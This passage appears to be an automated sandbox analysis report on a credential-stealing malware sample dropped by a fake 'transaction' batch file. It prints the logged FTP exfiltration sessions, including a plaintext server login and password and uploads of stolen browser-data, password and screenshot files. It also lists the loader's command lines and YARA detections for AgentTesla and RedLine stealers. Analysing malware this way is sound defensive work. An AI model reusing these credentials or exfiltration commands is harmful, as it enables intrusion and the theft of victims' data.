                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                            Oct 30, 2024 08:35:09.569741011 CET4973421192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                            Oct 30, 2024 08:35:09.908655882 CET2149734110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                            Oct 30, 2024 08:35:09.908821106 CET4973421192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                            Oct 30, 2024 08:35:10.273730040 CET2149734110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                            Oct 30, 2024 08:35:10.612694979 CET2149734110.4.45.197192.168.2.4504 Unknown command
                                                                                            Oct 30, 2024 08:35:10.612874985 CET4973421192.168.2.4110.4.45.197PWD
                                                                                            Oct 30, 2024 08:35:10.951411963 CET2149734110.4.45.197192.168.2.4257 "/" is your current location
                                                                                            Oct 30, 2024 08:35:10.951900005 CET4973421192.168.2.4110.4.45.197TYPE I
                                                                                            Oct 30, 2024 08:35:11.290183067 CET2149734110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                            Oct 30, 2024 08:35:11.290445089 CET4973421192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:11.628808975 CET2149734110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,198,19)
                                                                                            Oct 30, 2024 08:35:11.635008097 CET4973421192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-932923_2024_10_30_04_05_07.txt
                                                                                            Oct 30, 2024 08:35:12.535938025 CET2149734110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:12.868870974 CET2149734110.4.45.197192.168.2.4226-File successfully transferred
                                                                                            226-File successfully transferred226 0.333 seconds (measured here), 9.82 Kbytes per second
                                                                                            Oct 30, 2024 08:35:12.911962032 CET4973421192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:13.251085043 CET2149734110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,217,1)
                                                                                            Oct 30, 2024 08:35:13.348221064 CET4973421192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-932923_2024_10_30_09_43_49.txt
                                                                                            Oct 30, 2024 08:35:14.264015913 CET2149734110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:14.599478960 CET2149734110.4.45.197192.168.2.4226 File successfully transferred
                                                                                            Oct 30, 2024 08:35:20.865628004 CET2149744110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 15:35. Server port: 21.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 11 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                            Oct 30, 2024 08:35:20.865926981 CET4974421192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                            Oct 30, 2024 08:35:21.207725048 CET2149744110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                            Oct 30, 2024 08:35:21.208947897 CET4974421192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                            Oct 30, 2024 08:35:21.581561089 CET2149744110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                            Oct 30, 2024 08:35:21.926707029 CET2149744110.4.45.197192.168.2.4504 Unknown command
                                                                                            Oct 30, 2024 08:35:21.926950932 CET4974421192.168.2.4110.4.45.197PWD
                                                                                            Oct 30, 2024 08:35:22.269224882 CET2149744110.4.45.197192.168.2.4257 "/" is your current location
                                                                                            Oct 30, 2024 08:35:22.269404888 CET4974421192.168.2.4110.4.45.197TYPE I
                                                                                            Oct 30, 2024 08:35:22.611031055 CET2149744110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                            Oct 30, 2024 08:35:22.614164114 CET4974421192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:22.956015110 CET2149744110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,213,73)
                                                                                            Oct 30, 2024 08:35:22.962696075 CET4974421192.168.2.4110.4.45.197STOR PW_user-932923_2024_10_30_03_35_18.html
                                                                                            Oct 30, 2024 08:35:23.899625063 CET2149744110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:24.250138044 CET2149744110.4.45.197192.168.2.4226-File successfully transferred
                                                                                            226-File successfully transferred226 0.352 seconds (measured here), 0.97 Kbytes per second
                                                                                            Oct 30, 2024 08:35:24.370490074 CET4974421192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:24.883752108 CET2149744110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,219,211)
                                                                                            Oct 30, 2024 08:35:24.891191006 CET4974421192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-932923_2024_10_30_09_43_59.txt
                                                                                            Oct 30, 2024 08:35:25.791163921 CET2149744110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:26.135822058 CET2149744110.4.45.197192.168.2.4226-File successfully transferred
                                                                                            226-File successfully transferred226 0.345 seconds (measured here), 9.51 Kbytes per second
                                                                                            Oct 30, 2024 08:35:26.136253119 CET4974421192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:26.478383064 CET2149744110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,244,2)
                                                                                            Oct 30, 2024 08:35:26.487298012 CET4974421192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-932923_2024_10_30_12_12_41.txt
                                                                                            Oct 30, 2024 08:35:27.406430006 CET2149744110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:27.762337923 CET2149744110.4.45.197192.168.2.4226 File successfully transferred
                                                                                            Oct 30, 2024 08:35:37.338639975 CET2149753110.4.45.197192.168.2.4220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.
                                                                                            220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                                                                                            Oct 30, 2024 08:35:37.340873957 CET4975321192.168.2.4110.4.45.197USER origin@haliza.com.my
                                                                                            Oct 30, 2024 08:35:37.670998096 CET2149753110.4.45.197192.168.2.4331 User origin@haliza.com.my OK. Password required
                                                                                            Oct 30, 2024 08:35:37.675668001 CET4975321192.168.2.4110.4.45.197PASS JesusChrist007$
                                                                                            Oct 30, 2024 08:35:38.028072119 CET2149753110.4.45.197192.168.2.4230 OK. Current restricted directory is /
                                                                                            Oct 30, 2024 08:35:38.361502886 CET2149753110.4.45.197192.168.2.4504 Unknown command
                                                                                            Oct 30, 2024 08:35:38.361772060 CET4975321192.168.2.4110.4.45.197PWD
                                                                                            Oct 30, 2024 08:35:38.690716982 CET2149753110.4.45.197192.168.2.4257 "/" is your current location
                                                                                            Oct 30, 2024 08:35:38.690996885 CET4975321192.168.2.4110.4.45.197TYPE I
                                                                                            Oct 30, 2024 08:35:39.021226883 CET2149753110.4.45.197192.168.2.4200 TYPE is now 8-bit binary
                                                                                            Oct 30, 2024 08:35:39.021478891 CET4975321192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:39.351174116 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,249,196)
                                                                                            Oct 30, 2024 08:35:39.357736111 CET4975321192.168.2.4110.4.45.197STOR PW_user-932923_2024_10_30_03_35_35.html
                                                                                            Oct 30, 2024 08:35:40.259845018 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:40.590024948 CET2149753110.4.45.197192.168.2.4226-File successfully transferred
                                                                                            226-File successfully transferred226 0.331 seconds (measured here), 1.03 Kbytes per second
                                                                                            Oct 30, 2024 08:35:40.647682905 CET4975321192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:40.984262943 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,245,242)
                                                                                            Oct 30, 2024 08:35:40.990443945 CET4975321192.168.2.4110.4.45.197STOR CO_Chrome_Default.txt_user-932923_2024_10_30_09_44_21.txt
                                                                                            Oct 30, 2024 08:35:41.894920111 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:42.226413965 CET2149753110.4.45.197192.168.2.4226-File successfully transferred
                                                                                            226-File successfully transferred226 0.333 seconds (measured here), 9.85 Kbytes per second
                                                                                            Oct 30, 2024 08:35:42.226949930 CET4975321192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:35:42.556190014 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,239,11)
                                                                                            Oct 30, 2024 08:35:42.562902927 CET4975321192.168.2.4110.4.45.197STOR CO_Firefox_fqs92o4p.default-release.txt_user-932923_2024_10_30_12_13_08.txt
                                                                                            Oct 30, 2024 08:35:43.476490974 CET2149753110.4.45.197192.168.2.4150 Accepted data connection
                                                                                            Oct 30, 2024 08:35:43.807782888 CET2149753110.4.45.197192.168.2.4226 File successfully transferred
                                                                                            Oct 30, 2024 08:37:04.723928928 CET4975321192.168.2.4110.4.45.197PASV
                                                                                            Oct 30, 2024 08:37:05.052964926 CET2149753110.4.45.197192.168.2.4227 Entering Passive Mode (110,4,45,197,208,121)
                                                                                            Oct 30, 2024 08:37:05.059341908 CET4975321192.168.2.4110.4.45.197STOR SC_user-932923_2024_10_30_03_37_03.jpeg
                                                                                            Oct 30, 2024 08:37:05.959093094 CET2149753110.4.45.197192.168.2.4150 Accepted data connection

                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "
                                                                                            Imagebase:0x7ff79ac20000
                                                                                            File size:289'792 bytes
                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:1
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:2
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\extrac32.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                            Imagebase:0x7ff670c10000
                                                                                            File size:35'328 bytes
                                                                                            MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:3
                                                                                            Start time:03:34:56
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\x.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'138'688 bytes
                                                                                            MD5 hash:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 32%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:4
                                                                                            Start time:03:35:00
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" "
                                                                                            Imagebase:0x240000
                                                                                            File size:236'544 bytes
                                                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:5
                                                                                            Start time:03:35:00
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:6
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                            Imagebase:0x860000
                                                                                            File size:352'768 bytes
                                                                                            MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:7
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o
                                                                                            Imagebase:0x860000
                                                                                            File size:352'768 bytes
                                                                                            MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:8
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                            Imagebase:0x7ff7699e0000
                                                                                            File size:862'208 bytes
                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:high
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:9
                                                                                            Start time:03:35:01
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1885700149.0000000029CE4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 00000009.00000002.1887771568.000000002C980000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:10
                                                                                            Start time:03:35:10
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\Cllyjbrx.PIF
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\Public\Libraries\Cllyjbrx.PIF"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'138'688 bytes
                                                                                            MD5 hash:08C4AFC4A714EDFE9F2554B72DA40A04
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:Borland Delphi
                                                                                            Antivirus matches:
                                                                                            • Detection: 32%, ReversingLabs
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:11
                                                                                            Start time:03:35:12
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:C:\Users\Public\Libraries\xrbjyllC.pif
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 0000000B.00000002.2039752905.0000000029A80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2037584251.0000000026FED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.2004085524.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2037584251.0000000026FA4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000001.1826572703.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            Reputation:moderate
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:13
                                                                                            Start time:03:35:18
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe"
                                                                                            Imagebase:0x400000
                                                                                            File size:68'096 bytes
                                                                                            MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                            Has elevated privileges:false
                                                                                            Has administrator privileges:false
                                                                                            Programmed in:C, C++ or other language
                                                                                            Antivirus matches:
                                                                                            • Detection: 3%, ReversingLabs
                                                                                            Has exited:true

                                                                                            General

                                                                                            Target ID:16
                                                                                            Start time:03:35:26
                                                                                            Start date:30/10/2024
                                                                                            Path:C:\Users\Public\Libraries\Cllyjbrx.PIF
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\Public\Libraries\Cllyjbrx.PIF"
                                                                                            Imagebase:0x400000
                                                                                            File size:1'138'688 bytes
